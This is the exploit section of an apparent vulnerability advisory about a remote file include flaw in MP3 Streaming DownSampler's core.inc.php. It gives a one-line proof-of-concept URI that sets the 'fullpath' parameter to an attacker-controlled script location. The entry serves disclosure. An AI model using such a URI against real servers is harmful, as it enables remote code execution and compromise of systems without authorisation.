• info
• discussion
• exploit
• solution
• references

MP3 Streaming DownSampler Core.Inc.PHP Remote File Include Vulnerability

An attacker may exploit this issue using a web client.

The following proof-of-concept URI is available:

http://www.example.com/Core/core.inc.php?fullpath=evilscripts?